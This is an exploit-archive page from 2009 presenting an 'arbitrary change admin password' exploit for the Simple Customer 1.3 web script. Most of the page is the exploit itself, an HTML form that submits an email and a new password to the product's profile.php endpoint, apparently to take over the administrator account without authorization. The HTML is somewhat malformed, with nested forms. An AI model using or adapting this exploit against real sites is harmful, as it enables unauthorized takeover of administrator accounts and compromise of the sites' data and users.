[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Simple Customer 1.3 Arbitrary Change Admin Password Exploit
# Published : 2009-05-07
# Author : ahmadbady
# Previous Title : ST-Gallery 0.1a Multiple SQL Injection Vulnerabilities
# Next Title : Job Script 2.0 Arbitrary Change Admin Password Exploit


---- Remote Change admin Password----
----------------------------
script:Simple Customer 1.3
----------------------------
Author: ahmadbady
email:kivi_hacker666@yahoo.com

--------------------
download from:http://www.simplecustomer.com/  New (Version 1.3)

--------------------
xpl:



</head>
<body>
<form action="http://www.simplecustomer.com/demo/profile.php" method="post">
<div class="container">
  <div class="leftcolumn">
    <h2>coded by ahmadbady</h2>
    </span>
    <form id="form1" name="form1" method="post" action="">
      <p>Email
        <br />
        <input name="email" type="text" id="email" value="" class="required validate-email" size="35" />
      </p>
      <p><br />
        <input name="password" type="password" id="password" />
          <br />
      </p>
      <p>Home Page<br />
        <input name="Submit2" type="submit" id="Submit2" value="Update" /> 
        </p>
    </form>

# www.Syue.com [2009-05-07]